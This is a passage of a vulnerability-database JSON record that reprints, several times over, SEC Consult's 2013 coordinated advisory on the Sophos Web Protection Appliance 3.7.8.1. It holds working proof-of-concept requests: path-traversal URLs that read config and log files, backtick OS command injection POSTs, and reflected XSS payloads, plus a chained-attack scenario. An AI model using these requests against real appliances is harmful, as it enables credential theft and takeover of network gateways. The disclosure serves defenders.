Gecko/20100101 Firefox/19.0"\r\n\r\n\r\n2) OS command injection (CVE-2013-2642)\r\nThe "Diagnostic Tools" functionality allows an authenticated user to inject\r\narbitrary operating system commands enclosed in backticks (`). These commands\r\nare run with the privileges of the operating system user "spiderman":\r\n\r\nPOST /index.php?c=diagnostic_tools HTTP/1.1\r\nHost: <host>\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nContent-Length: 92\r\nCache-Control: no-cache\r\n\r\naction=wget&section=configuration&STYLE=<valid session id>&url=%60sleep%205%60\r\n\r\n\r\nThe "Local Site List" functionality allows injection of arbitrary OS commands:\r\n\r\nPOST /index.php?c=local_site_list_editor HTTP/1.1\r\nHost: <host>\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nContent-Length: 205\r\n\r\nSTYLE=<valid session\r\nid>&action=save&entries=[{"url"%3a+".'`sleep+10`'",+"range"%3a+"no",+"tld"%3a+"yes",+"valid_range"%3a+"no"}]\r\n\r\nNote: Unauthenticated users can retrieve valid session IDs using the\r\nvulnerability in 1).\r\n\r\nIf a customized template for the "Block page" uses the variable\r\n"%%user_workstation%%", an _unauthenticated_ user can inject OS commands using the\r\nfollowing URL:\r\n\r\nhttps://<host>/end-user/index.php?reason=application&client-ip=%20%60sleep+10%60\r\n\r\n\r\n3) Reflected Cross Site Scripting (XSS) (CVE-2013-2643)\r\nThe following URLs demonstrate reflected Cross Site Scripting vulnerabilities:\r\n\r\nhttps://<host>/rss.php?action=allow&xss=%3Cscript%3Ealert%28String.fromCharCode%28120,%20115,%20115%29%29%3C/script%3E\r\nhttps://<host>/end-user/errdoc.php?e=530&msg=PHNjcmlwdD5hbGVydCgneHNzJyk7PC9zY3JpcHQ%2bCg%3d%3d\r\nhttps://<host>/end-user/ftp_redirect.php?r=x&h=%3C/script%3E%3Cscript%3Ealert%281%29%3b%3C/script%3E\r\nhttps://<host>/index.php?c=blocked&reason=malware&user=&&threat=%3Cscript%3Ealert%281%29%3C/script%3E\r\n\r\nAs the application uses URL parameters to transmit session IDs and rather\r\nthan cookies, session stealing attacks cannot be executed using these flaws.\r\nHowever, these vulnerabilities can still be used to fake login pages for\r\nphishing purposes.\r\nFurthermore the vulnerabilities in 1) and 2) can be exploited via one of the\r\nXSS vulnerabilities. This enables attacks on the appliance even when the\r\nweb interface would otherwise not be reachable to the attacker.\r\n\r\nPossible attack scenario:\r\nUse XSS to run malicous Javascript in the browser of a user who has network\r\naccess to the web interface. This code can:\r\n- Exploit the local file disclosure vulnerability (see 1) in order to gain\r\n access to valid session IDs and impersonate administrator users.\r\n- Exploit the OS command injection (see 2) in order to execute arbitrary\r\n commands on the system.\r\n- Exfiltrate sensitive information like HTTP, (plaintext) HTTPS traffic or the\r\n private key for the CA certificate used for HTTPS scanning (MITM).\r\n\r\n\r\nVulnerable / tested versions:\r\n-----------------------------\r\nThe vulnerabilities have been verified to exist in the Sophos Web Protection\r\nAppliance version 3.7.8.1, which was the most recent version at the time of\r\ndiscovery.\r\n\r\n\r\nVendor contact timeline:\r\n------------------------\r\n2013-02-22: Sending advisory and proof of concept exploit via encrypted\r\n channel.\r\n2013-02-23: Vendor acknowledges receipt of advisory.\r\n2013-03-01: Vendor confirms reported issues and provides preliminary\r\n information about release dates.\r\n2013-03-07: Conference call: Addressing the risks the discovered\r\n vulnerabilities pose to customers and release schedule.\r\n2013-03-18: Vendor starts rollout of update to "a first group of customers".\r\n2013-04-03: SEC Consult releases coordinated security advisory.\r\n\r\n\r\nSolution:\r\n---------\r\nUpdate to Web Protection Appliance version 3.7.8.2.\r\n\r\nMore information can be found at:\r\nhttp://www.sophos.com/en-us/support/knowledgebase/118969.aspx\r\n\r\n\r\nWorkaround:\r\n-----------\r\nNo workaround available.\r\n\r\n\r\nAdvisory URL:\r\n--------------\r\nhttps://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm\r\n\r\n\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nSEC Consult Unternehmensberatung GmbH\r\n\r\nOffice Vienna\r\nMooslackengasse 17\r\nA-1190 Vienna\r\nAustria\r\n\r\nTel.: +43 / 1 / 890 30 43 - 0\r\nFax.: +43 / 1 / 890 30 43 - 25\r\nMail: research at sec-consult dot com\r\nhttps://www.sec-consult.com\r\nhttp://blog.sec-consult.com\r\n\r\n\r\nEOF Wolfgang Ettlinger, Stefan Viehbock / @2013\r\n", "edition": 1, "modified": "2013-04-08T00:00:00", "published": "2013-04-08T00:00:00", "id": "SECURITYVULNS:DOC:29238", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29238", "title": "SEC Consult SA-20130403-0 :: Multiple vulnerabilities in Sophos Web Protection Appliance", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-02-19T13:31:12", "description": "Sophos Web Protection Appliance version 3.7.8.1 suffers from OS command injection, cross site scripting, and file disclosure vulnerabilities.", "edition": 2, "published": "2013-04-04T00:00:00", "type": "zdt", "title": "Sophos Web Protection Appliance 3.7.8.1 XSS / Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2641", "CVE-2013-2643", "CVE-2013-2642"], "modified": "2013-04-04T00:00:00", "id": "1337DAY-ID-20603", "href": "https://0day.today/exploit/description/20603", "sourceData": "=======================================================================\r\n title: Multiple vulnerabilities\r\n product: Sophos Web Protection Appliance\r\n vulnerable version: <= 3.7.8.1\r\n fixed version: 3.7.8.2\r\n impact: Critical\r\n CVE number: CVE-2013-2641, CVE-2013-2642, CVE-2013-2643\r\n homepage: http://www.sophos.com/\r\n found: 2013-01-14\r\n by: Wolfgang Ettlinger\r\n SEC Consult Vulnerability Lab\r\n https://www.sec-consult.com\r\n\r\n=======================================================================\r\n\r\nVendor/product description:\r\n-----------------------------\r\n\"Our award-winning Secure Web Gateway appliances make web protection easy.\r\nThey are quick to setup, simple to manage and make policy administration a\r\nsnap, even for non-technical users.\"\r\n\r\nURL: http://www.sophos.com/en-us/products/web/web-protection.aspx\r\n\r\n\r\nBusiness recommendation:\r\n------------------------\r\nSEC Consult has identified several vulnerabilities within the components of\r\nthe Sophos Web Protection Appliance in the course of a short crash test. Some\r\ncomponents have been spot-checked, while others have not been tested at all.\r\n\r\nAn attacker can get unauthorized access to the appliance and plant backdoors or\r\naccess configuration files containing credentials for other systems (eg. Active\r\nDirectory/FTP login) which can be used in further attacks.\r\nSince all web traffic passes through the appliance, interception of HTTP as\r\nwell as the plaintext form of HTTPS traffic (if HTTPS Scanning feature in use),\r\nincluding sensitive information like passwords and session Cookies is possible.\r\nIf HTTPS Scanning is enabled, the appliance holds a private key for a\r\nCertificate Authority (CA) certificate that is installed/trusted on all\r\nworkstations in the company. If this private key is compromised by an attacker,\r\narbitrary certificates can be signed. These certificates will then pass\r\nvalidation on the client machines, enabling in various attacks targeting\r\nclients (MITM, phishing, evilgrade, ...).\r\n\r\nThe recommendation of SEC Consult is to switch off the product until a\r\ncomprehensive security audit based on a security source code review has been\r\nperformed and all identified security deficiencies have been resolved by the\r\nvendor.\r\n\r\nVulnerability overview/description:\r\n-----------------------------------\r\n1) Unauthenticated local file disclosure (CVE-2013-2641)\r\nUnauthenticated users can read arbitrary files from the filesystem with the\r\nprivileges of the \"spiderman\" operating system user. These files include\r\nconfiguration files containing sensitive information such as clear text\r\npasswords which can be used in other attacks.\r\nFurthermore the webserver log file which holds valid PHP session IDs can be\r\naccessed. With this information administrator users can be impersonated.\r\n\r\n2) OS command injection (CVE-2013-2642)\r\nAuthenticated users can execute arbitrary commands on the underlying\r\noperating system with the privileges of the \"spiderman\" operating system user.\r\nThis can be used to get persistent access to the affected system (eg. by\r\nplanting backdoors), accessing all kinds locally stored information or\r\nintercepting web traffic that passes through the appliance.\r\nUnauthenticated users can exploit this kind of vulnerability too (depends on\r\nappliance configuration).\r\n\r\n3) Reflected Cross Site Scripting (XSS) (CVE-2013-2643)\r\nReflected Cross Site Scripting vulnerabilities were found. An attacker can use\r\nthese vulnerabilities the exploit other vulnerabilities in the web interface\r\nor conducting phishing attacks.\r\n\r\n\r\nProof of concept:\r\n-----------------\r\n1) Unauthenticated local file disclosure (CVE-2013-2641)\r\nAs an example, an unauthenticated user can download the configuration file\r\ncontaining the salted hash of the administrator password as well as clear text\r\npasswords e.g. for FTP backup storage or Active Directory authentication:\r\n\r\nhttps://<host>/cgi-bin/patience.cgi?id=../../persist/config/shared.conf%00\r\n\r\nFurthermore the Apache access log can be retrieved. As PHP session IDs are\r\npassed via the URL rather than via Cookies, these can be found in this log\r\nfile and effectively used to impersonate administrator users:\r\n\r\nhttps://<host>/cgi-bin/patience.cgi?id=../../log/ui_access_log%00\r\n\r\nAn excerpt from the log file shows that it contains PHP session ID information\r\n(parameter \"STYLE\").\r\n<host> - - [21/Feb/2013:17:02:17 +0000] \"POST /index.php?c=dashboard HTTP/1.1\" 200 139\r\n\"https://<host>/index.php?section=configuration&c=configuration&STYLE=8514d0a3c2fc9f8d47e2988076778153\"\r\n\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0\"\r\n\r\n\r\n2) OS command injection (CVE-2013-2642)\r\nThe \"Diagnostic Tools\" functionality allows an authenticated user to inject\r\narbitrary operating system commands enclosed in backticks (`). These commands\r\nare run with the privileges of the operating system user \"spiderman\":\r\n\r\nPOST /index.php?c=diagnostic_tools HTTP/1.1\r\nHost: <host>\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nContent-Length: 92\r\nCache-Control: no-cache\r\n\r\naction=wget§ion=configuration&STYLE=<valid session id>&url=%60sleep%205%60\r\n\r\n\r\nThe \"Local Site List\" functionality allows injection of arbitrary OS commands:\r\n\r\nPOST /index.php?c=local_site_list_editor HTTP/1.1\r\nHost: <host>\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nContent-Length: 205\r\n\r\nSTYLE=<valid session\r\nid>&action=save&entries=[{\"url\"%3a+\".'`sleep+10`'\",+\"range\"%3a+\"no\",+\"tld\"%3a+\"yes\",+\"valid_range\"%3a+\"no\"}]\r\n\r\nNote: Unauthenticated users can retrieve valid session IDs using the\r\nvulnerability in 1).\r\n\r\nIf a customized template for the \"Block page\" uses the variable\r\n\"%%user_workstation%%\", an _unauthenticated_ user can inject OS commands using the\r\nfollowing URL:\r\n\r\nhttps://<host>/end-user/index.php?reason=application&client-ip=%20%60sleep+10%60\r\n\r\n\r\n3) Reflected Cross Site Scripting (XSS) (CVE-2013-2643)\r\nThe following URLs demonstrate reflected Cross Site Scripting vulnerabilities:\r\n\r\nhttps://<host>/rss.php?action=allow&xss=%3Cscript%3Ealert%28String.fromCharCode%28120,%20115,%20115%29%29%3C/script%3E\r\nhttps://<host>/end-user/errdoc.php?e=530&msg=PHNjcmlwdD5hbGVydCgneHNzJyk7PC9zY3JpcHQ%2bCg%3d%3d\r\nhttps://<host>/end-user/ftp_redirect.php?r=x&h=%3C/script%3E%3Cscript%3Ealert%281%29%3b%3C/script%3E\r\nhttps://<host>/index.php?c=blocked&reason=malware&user=&&threat=%3Cscript%3Ealert%281%29%3C/script%3E\r\n\r\nAs the application uses URL parameters to transmit session IDs and rather\r\nthan cookies, session stealing attacks cannot be executed using these flaws.\r\nHowever, these vulnerabilities can still be used to fake login pages for\r\nphishing purposes.\r\nFurthermore the vulnerabilities in 1) and 2) can be exploited via one of the\r\nXSS vulnerabilities. This enables attacks on the appliance even when the\r\nweb interface would otherwise not be reachable to the attacker.\r\n\r\nPossible attack scenario:\r\nUse XSS to run malicous Javascript in the browser of a user who has network\r\naccess to the web interface. This code can:\r\n- Exploit the local file disclosure vulnerability (see 1) in order to gain\r\n access to valid session IDs and impersonate administrator users.\r\n- Exploit the OS command injection (see 2) in order to execute arbitrary\r\n commands on the system.\r\n- Exfiltrate sensitive information like HTTP, (plaintext) HTTPS traffic or the\r\n private key for the CA certificate used for HTTPS scanning (MITM).\r\n\r\n\r\nVulnerable / tested versions:\r\n-----------------------------\r\nThe vulnerabilities have been verified to exist in the Sophos Web Protection\r\nAppliance version 3.7.8.1, which was the most recent version at the time of\r\ndiscovery.\r\n\r\n\r\nVendor contact timeline:\r\n------------------------\r\n2013-02-22: Sending advisory and proof of concept exploit via encrypted\r\n channel.\r\n2013-02-23: Vendor acknowledges receipt of advisory.\r\n2013-03-01: Vendor confirms reported issues and provides preliminary\r\n information about release dates.\r\n2013-03-07: Conference call: Addressing the risks the discovered\r\n vulnerabilities pose to customers and release schedule.\r\n2013-03-18: Vendor starts rollout of update to \"a first group of customers\".\r\n2013-04-03: SEC Consult releases coordinated security advisory.\r\n\r\n\r\nSolution:\r\n---------\r\nUpdate to Web Protection Appliance version 3.7.8.2.\r\n\r\nMore information can be found at:\r\nhttp://www.sophos.com/en-us/support/knowledgebase/118969.aspx\r\n\r\n\r\nWorkaround:\r\n-----------\r\nNo workaround available.\n\n# 0day.today [2018-02-19] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/20603"}], "packetstorm": [{"lastseen": "2016-12-05T22:15:43", "description": "", "published": "2013-04-03T00:00:00", "type": "packetstorm", "title": "Sophos Web Protection Appliance 3.7.8.1 XSS / Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2641", "CVE-2013-2643", "CVE-2013-2642"], "modified": "2013-04-03T00:00:00", "id": "PACKETSTORM:121060", "href": "https://packetstormsecurity.com/files/121060/Sophos-Web-Protection-Appliance-3.7.8.1-XSS-Command-Execution.html", "sourceData": "`SEC Consult Vulnerability Lab Security Advisory < 20130403-0 > \n======================================================================= \ntitle: Multiple vulnerabilities \nproduct: Sophos Web Protection Appliance \nvulnerable version: <= 3.7.8.1 \nfixed version: 3.7.8.2 \nimpact: Critical \nCVE number: CVE-2013-2641, CVE-2013-2642, CVE-2013-2643 \nhomepage: http://www.sophos.com/ \nfound: 2013-01-14 \nby: Wolfgang Ettlinger \nSEC Consult Vulnerability Lab \nhttps://www.sec-consult.com \n \n======================================================================= \n \nVendor/product description: \n----------------------------- \n\"Our award-winning Secure Web Gateway appliances make web protection easy. \nThey are quick to setup, simple to manage and make policy administration a \nsnap, even for non-technical users.\" \n \nURL: http://www.sophos.com/en-us/products/web/web-protection.aspx \n \n \nBusiness recommendation: \n------------------------ \nSEC Consult has identified several vulnerabilities within the components of \nthe Sophos Web Protection Appliance in the course of a short crash test. Some \ncomponents have been spot-checked, while others have not been tested at all. \n \nAn attacker can get unauthorized access to the appliance and plant backdoors or \naccess configuration files containing credentials for other systems (eg. Active \nDirectory/FTP login) which can be used in further attacks. \nSince all web traffic passes through the appliance, interception of HTTP as \nwell as the plaintext form of HTTPS traffic (if HTTPS Scanning feature in use), \nincluding sensitive information like passwords and session Cookies is possible. \nIf HTTPS Scanning is enabled, the appliance holds a private key for a \nCertificate Authority (CA) certificate that is installed/trusted on all \nworkstations in the company. If this private key is compromised by an attacker, \narbitrary certificates can be signed. These certificates will then pass \nvalidation on the client machines, enabling in various attacks targeting \nclients (MITM, phishing, evilgrade, ...). \n \nThe recommendation of SEC Consult is to switch off the product until a \ncomprehensive security audit based on a security source code review has been \nperformed and all identified security deficiencies have been resolved by the \nvendor. \n \nVulnerability overview/description: \n----------------------------------- \n1) Unauthenticated local file disclosure (CVE-2013-2641) \nUnauthenticated users can read arbitrary files from the filesystem with the \nprivileges of the \"spiderman\" operating system user. These files include \nconfiguration files containing sensitive information such as clear text \npasswords which can be used in other attacks. \nFurthermore the webserver log file which holds valid PHP session IDs can be \naccessed. With this information administrator users can be impersonated. \n \n2) OS command injection (CVE-2013-2642) \nAuthenticated users can execute arbitrary commands on the underlying \noperating system with the privileges of the \"spiderman\" operating system user. \nThis can be used to get persistent access to the affected system (eg. by \nplanting backdoors), accessing all kinds locally stored information or \nintercepting web traffic that passes through the appliance. \nUnauthenticated users can exploit this kind of vulnerability too (depends on \nappliance configuration). \n \n3) Reflected Cross Site Scripting (XSS) (CVE-2013-2643) \nReflected Cross Site Scripting vulnerabilities were found. An attacker can use \nthese vulnerabilities the exploit other vulnerabilities in the web interface \nor conducting phishing attacks. \n \n \nProof of concept: \n----------------- \n1) Unauthenticated local file disclosure (CVE-2013-2641) \nAs an example, an unauthenticated user can download the configuration file \ncontaining the salted hash of the administrator password as well as clear text \npasswords e.g. for FTP backup storage or Active Directory authentication: \n \nhttps://<host>/cgi-bin/patience.cgi?id=../../persist/config/shared.conf%00 \n \nFurthermore the Apache access log can be retrieved. As PHP session IDs are \npassed via the URL rather than via Cookies, these can be found in this log \nfile and effectively used to impersonate administrator users: \n \nhttps://<host>/cgi-bin/patience.cgi?id=../../log/ui_access_log%00 \n \nAn excerpt from the log file shows that it contains PHP session ID information \n(parameter \"STYLE\"). \n<host> - - [21/Feb/2013:17:02:17 +0000] \"POST /index.php?c=dashboard HTTP/1.1\" 200 139 \n\"https://<host>/index.php?section=configuration&c=configuration&STYLE=8514d0a3c2fc9f8d47e2988076778153\" \n\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0\" \n \n \n2) OS command injection (CVE-2013-2642) \nThe \"Diagnostic Tools\" functionality allows an authenticated user to inject \narbitrary operating system commands enclosed in backticks (`). These commands \nare run with the privileges of the operating system user \"spiderman\": \n \nPOST /index.php?c=diagnostic_tools HTTP/1.1 \nHost: <host> \nContent-Type: application/x-www-form-urlencoded; charset=UTF-8 \nContent-Length: 92 \nCache-Control: no-cache \n \naction=wget§ion=configuration&STYLE=<valid session id>&url=%60sleep%205%60 \n \n \nThe \"Local Site List\" functionality allows injection of arbitrary OS commands: \n \nPOST /index.php?c=local_site_list_editor HTTP/1.1 \nHost: <host> \nContent-Type: application/x-www-form-urlencoded; charset=UTF-8 \nContent-Length: 205 \n \nSTYLE=<valid session \nid>&action=save&entries=[{\"url\"%3a+\".'`sleep+10`'\",+\"range\"%3a+\"no\",+\"tld\"%3a+\"yes\",+\"valid_range\"%3a+\"no\"}] \n \nNote: Unauthenticated users can retrieve valid session IDs using the \nvulnerability in 1). \n \nIf a customized template for the \"Block page\" uses the variable \n\"%%user_workstation%%\", an _unauthenticated_ user can inject OS commands using the \nfollowing URL: \n \nhttps://<host>/end-user/index.php?reason=application&client-ip=%20%60sleep+10%60 \n \n \n3) Reflected Cross Site Scripting (XSS) (CVE-2013-2643) \nThe following URLs demonstrate reflected Cross Site Scripting vulnerabilities: \n \nhttps://<host>/rss.php?action=allow&xss=%3Cscript%3Ealert%28String.fromCharCode%28120,%20115,%20115%29%29%3C/script%3E \nhttps://<host>/end-user/errdoc.php?e=530&msg=PHNjcmlwdD5hbGVydCgneHNzJyk7PC9zY3JpcHQ%2bCg%3d%3d \nhttps://<host>/end-user/ftp_redirect.php?r=x&h=%3C/script%3E%3Cscript%3Ealert%281%29%3b%3C/script%3E \nhttps://<host>/index.php?c=blocked&reason=malware&user=&&threat=%3Cscript%3Ealert%281%29%3C/script%3E \n \nAs the application uses URL parameters to transmit session IDs and rather \nthan cookies, session stealing attacks cannot be executed using these flaws. \nHowever, these vulnerabilities can still be used to fake login pages for \nphishing purposes. \nFurthermore the vulnerabilities in 1) and 2) can be exploited via one of the \nXSS vulnerabilities. This enables attacks on the appliance even when the \nweb interface would otherwise not be reachable to the attacker. \n \nPossible attack scenario: \nUse XSS to run malicous Javascript in the browser of a user who has network \naccess to the web interface. This code can: \n- Exploit the local file disclosure vulnerability (see 1) in order to gain \naccess to valid session IDs and impersonate administrator users. \n- Exploit the OS command injection (see 2) in order to execute arbitrary \ncommands on the system. \n- Exfiltrate sensitive information like HTTP, (plaintext) HTTPS traffic or the \nprivate key for the CA certificate used for HTTPS scanning (MITM). \n \n \nVulnerable / tested versions: \n----------------------------- \nThe vulnerabilities have been verified to exist in the Sophos Web Protection \nAppliance version 3.7.8.1, which was the most recent version at the time of \ndiscovery. \n \n \nVendor contact timeline: \n------------------------ \n2013-02-22: Sending advisory and proof of concept exploit via encrypted \nchannel. \n2013-02-23: Vendor acknowledges receipt of advisory. \n2013-03-01: Vendor confirms reported issues and provides preliminary \ninformation about release dates. \n2013-03-07: Conference call: Addressing the risks the discovered \nvulnerabilities pose to customers and release schedule. \n2013-03-18: Vendor starts rollout of update to \"a first group of customers\". \n2013-04-03: SEC Consult releases coordinated security advisory. \n \n \nSolution: \n--------- \nUpdate to Web Protection Appliance version 3.7.8.2. \n \nMore information can be found at: \nhttp://www.sophos.com/en-us/support/knowledgebase/118969.aspx \n \n \nWorkaround: \n----------- \nNo workaround available. \n \n \nAdvisory URL: \n-------------- \nhttps://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm \n \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \nSEC Consult Unternehmensberatung GmbH \n \nOffice Vienna \nMooslackengasse 17 \nA-1190 Vienna \nAustria \n \nTel.: +43 / 1 / 890 30 43 - 0 \nFax.: +43 / 1 / 890 30 43 - 25 \nMail: research at sec-consult dot com \nhttps://www.sec-consult.com \nhttp://blog.sec-consult.com \n \n \nEOF Wolfgang Ettlinger, Stefan Viehb\u00f6ck / @2013 \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/121060/SA-20130403-0.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:49", "description": "\nSophos Web Protection Appliance 3.7.8.1 - Multiple Vulnerabilities", "edition": 1, "published": "2013-04-08T00:00:00", "title": "Sophos Web Protection Appliance 3.7.8.1 - Multiple Vulnerabilities", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2641", "CVE-2013-2643", "CVE-2013-2642"], "modified": "2013-04-08T00:00:00", "id": "EXPLOITPACK:909AB3D0816FBD028C02331AB9C0821B", "href": "", "sourceData": "SEC Consult Vulnerability Lab Security Advisory < 20130403-0 >\n=======================================================================\n title: Multiple vulnerabilities\n product: Sophos Web Protection Appliance\n vulnerable version: <= 3.7.8.1\n fixed version: 3.7.8.2\n impact: Critical\n CVE number: CVE-2013-2641, CVE-2013-2642, CVE-2013-2643\n homepage: http://www.sophos.com/\n found: 2013-01-14\n by: Wolfgang Ettlinger\n SEC Consult Vulnerability Lab\n https://www.sec-consult.com\n\n=======================================================================\n\nVendor/product description:\n-----------------------------\n\"Our award-winning Secure Web Gateway appliances make web protection easy.\nThey are quick to setup, simple to manage and make policy administration a\nsnap, even for non-technical users.\"\n\nURL: http://www.sophos.com/en-us/products/web/web-protection.aspx\n\n\nBusiness recommendation:\n------------------------\nSEC Consult has identified several vulnerabilities within the components of\nthe Sophos Web Protection Appliance in the course of a short crash test. Some\ncomponents have been spot-checked, while others have not been tested at all.\n\nAn attacker can get unauthorized access to the appliance and plant backdoors or\naccess configuration files containing credentials for other systems (eg. Active\nDirectory/FTP login) which can be used in further attacks.\nSince all web traffic passes through the appliance, interception of HTTP as\nwell as the plaintext form of HTTPS traffic (if HTTPS Scanning feature in use),\nincluding sensitive information like passwords and session Cookies is possible.\nIf HTTPS Scanning is enabled, the appliance holds a private key for a\nCertificate Authority (CA) certificate that is installed/trusted on all\nworkstations in the company. If this private key is compromised by an attacker,\narbitrary certificates can be signed. These certificates will then pass\nvalidation on the client machines, enabling in various attacks targeting\nclients (MITM, phishing, evilgrade, ...).\n\nThe recommendation of SEC Consult is to switch off the product until a\ncomprehensive security audit based on a security source code review has been\nperformed and all identified security deficiencies have been resolved by the\nvendor.\n\nVulnerability overview/description:\n-----------------------------------\n1) Unauthenticated local file disclosure (CVE-2013-2641)\nUnauthenticated users can read arbitrary files from the filesystem with the\nprivileges of the \"spiderman\" operating system user. These files include\nconfiguration files containing sensitive information such as clear text\npasswords which can be used in other attacks.\nFurthermore the webserver log file which holds valid PHP session IDs can be\naccessed. With this information administrator users can be impersonated.\n\n2) OS command injection (CVE-2013-2642)\nAuthenticated users can execute arbitrary commands on the underlying\noperating system with the privileges of the \"spiderman\" operating system user.\nThis can be used to get persistent access to the affected system (eg. by\nplanting backdoors), accessing all kinds locally stored information or\nintercepting web traffic that passes through the appliance.\nUnauthenticated users can exploit this kind of vulnerability too (depends on\nappliance configuration).\n\n3) Reflected Cross Site Scripting (XSS) (CVE-2013-2643)\nReflected Cross Site Scripting vulnerabilities were found. An attacker can use\nthese vulnerabilities the exploit other vulnerabilities in the web interface\nor conducting phishing attacks.\n\n\nProof of concept:\n-----------------\n1) Unauthenticated local file disclosure (CVE-2013-2641)\nAs an example, an unauthenticated user can download the configuration file\ncontaining the salted hash of the administrator password as well as clear text\npasswords e.g. for FTP backup storage or Active Directory authentication:\n\nhttps://<host>/cgi-bin/patience.cgi?id=../../persist/config/shared.conf%00\n\nFurthermore the Apache access log can be retrieved. As PHP session IDs are\npassed via the URL rather than via Cookies, these can be found in this log\nfile and effectively used to impersonate administrator users:\n\nhttps://<host>/cgi-bin/patience.cgi?id=../../log/ui_access_log%00\n\nAn excerpt from the log file shows that it contains PHP session ID information\n(parameter \"STYLE\").\n<host> - - [21/Feb/2013:17:02:17 +0000] \"POST /index.php?c=dashboard HTTP/1.1\" 200 139\n\"https://<host>/index.php?section=configuration&c=configuration&STYLE=8514d0a3c2fc9f8d47e2988076778153\"\n\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0\"\n\n\n2) OS command injection (CVE-2013-2642)\nThe \"Diagnostic Tools\" functionality allows an authenticated user to inject\narbitrary operating system commands enclosed in backticks (`). These commands\nare run with the privileges of the operating system user \"spiderman\":\n\nPOST /index.php?c=diagnostic_tools HTTP/1.1\nHost: <host>\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nContent-Length: 92\nCache-Control: no-cache\n\naction=wget§ion=configuration&STYLE=<valid session id>&url=%60sleep%205%60\n\n\nThe \"Local Site List\" functionality allows injection of arbitrary OS commands:\n\nPOST /index.php?c=local_site_list_editor HTTP/1.1\nHost: <host>\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nContent-Length: 205\n\nSTYLE=<valid session\nid>&action=save&entries=[{\"url\"%3a+\".'`sleep+10`'\",+\"range\"%3a+\"no\",+\"tld\"%3a+\"yes\",+\"valid_range\"%3a+\"no\"}]\n\nNote: Unauthenticated users can retrieve valid session IDs using the\nvulnerability in 1).\n\nIf a customized template for the \"Block page\" uses the variable\n\"%%user_workstation%%\", an _unauthenticated_ user can inject OS commands using the\nfollowing URL:\n\nhttps://<host>/end-user/index.php?reason=application&client-ip=%20%60sleep+10%60\n\n\n3) Reflected Cross Site Scripting (XSS) (CVE-2013-2643)\nThe following URLs demonstrate reflected Cross Site Scripting vulnerabilities:\n\nhttps://<host>/rss.php?action=allow&xss=%3Cscript%3Ealert%28String.fromCharCode%28120,%20115,%20115%29%29%3C/script%3E\nhttps://<host>/end-user/errdoc.php?e=530&msg=PHNjcmlwdD5hbGVydCgneHNzJyk7PC9zY3JpcHQ%2bCg%3d%3d\nhttps://<host>/end-user/ftp_redirect.php?r=x&h=%3C/script%3E%3Cscript%3Ealert%281%29%3b%3C/script%3E\nhttps://<host>/index.php?c=blocked&reason=malware&user=&&threat=%3Cscript%3Ealert%281%29%3C/script%3E\n\nAs the application uses URL parameters to transmit session IDs and rather\nthan cookies, session stealing attacks cannot be executed using these flaws.\nHowever, these vulnerabilities can still be used to fake login pages for\nphishing purposes.\nFurthermore the vulnerabilities in 1) and 2) can be exploited via one of the\nXSS vulnerabilities. This enables attacks on the appliance even when the\nweb interface would otherwise not be reachable to the attacker.\n\nPossible attack scenario:\nUse XSS to run malicous Javascript in the browser of a user who has network\naccess to the web interface. This code can:\n- Exploit the local file disclosure vulnerability (see 1) in order to gain\n access to valid session IDs and impersonate administrator users.\n- Exploit the OS command injection (see 2) in order to execute arbitrary\n commands on the system.\n- Exfiltrate sensitive information like HTTP, (plaintext) HTTPS traffic or the\n private key for the CA certificate used for HTTPS scanning (MITM).\n\n\nVulnerable / tested versions:\n-----------------------------\nThe vulnerabilities have been verified to exist in the Sophos Web Protection\nAppliance version 3.7.8.1, which was the most recent version at the time of\ndiscovery.\n\n\nVendor contact timeline:\n------------------------\n2013-02-22: Sending advisory and proof of concept exploit via encrypted\n channel.\n2013-02-23: Vendor acknowledges receipt of advisory.\n2013-03-01: Vendor confirms reported issues and provides preliminary\n information about release dates.\n2013-03-07: Conference call: Addressing the risks the discovered\n vulnerabilities pose to customers and release schedule.\n2013-03-18: Vendor starts rollout of update to \"a first group of customers\".\n2013-04-03: SEC Consult releases coordinated security advisory.\n\n\nSolution:\n---------\nUpdate to Web Protection Appliance version 3.7.8.2.\n\nMore information can be found at:\nhttp://www.sophos.com/en-us/support/knowledgebase/118969.aspx\n\n\nWorkaround:\n-----------\nNo workaround available.\n\n\nAdvisory URL:\n--------------\nhttps://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm\n\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nSEC Consult Unternehmensberatung GmbH\n\nOffice Vienna\nMooslackengasse 17\nA-1190 Vienna\nAustria\n\nTel.: +43 / 1 / 890 30 43 - 0\nFax.: +43 / 1 / 890 30 43 - 25\nMail: research at sec-consult dot 